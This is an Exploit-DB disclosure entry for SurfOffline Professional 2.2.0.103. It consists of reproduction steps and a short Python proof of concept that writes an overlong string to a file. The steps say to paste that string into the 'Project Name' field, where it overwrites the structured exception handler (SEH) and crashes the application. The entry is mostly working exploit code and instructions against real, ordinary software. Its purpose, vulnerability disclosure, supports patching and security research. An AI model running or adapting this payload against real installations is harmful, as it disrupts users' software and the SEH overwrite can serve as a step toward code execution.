SurfOffline Professional 2.2.0.103 – ‘Project Name’ Denial of Service (SEH)

  • Author: Chris Inzinga
    Date: 2019-12-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47795/
  • # Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
    # Date: 2019-12-18
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: http://www.bimesoft.com/
    # Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
    # Version: 2.2.0.103
    # Tested on: Windows 7 SP1 (x86)
    
    # Steps to reproduce:
    # 1. Generate a malicious payload via the PoC
    # 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
    # 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
    # 4. Observe a program DoS crash, overwriting SEH
    
    #!/usr/bin/python
    
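    # 382 filler bytes followed by two 4-byte markers; per step 4 above,
    # pasting this as the 'Project Name' overwrites SEH and crashes the program.
    payload = "A" * 382 + "B" * 4 + "C" * 4
    
    try:
        fileCreate = open("exploit.txt", "w")
        print("[x] Creating file")
        fileCreate.write(payload)
        fileCreate.close()
        print("[x] File created")
    except (IOError, OSError):
        print("[!] File failed to be created")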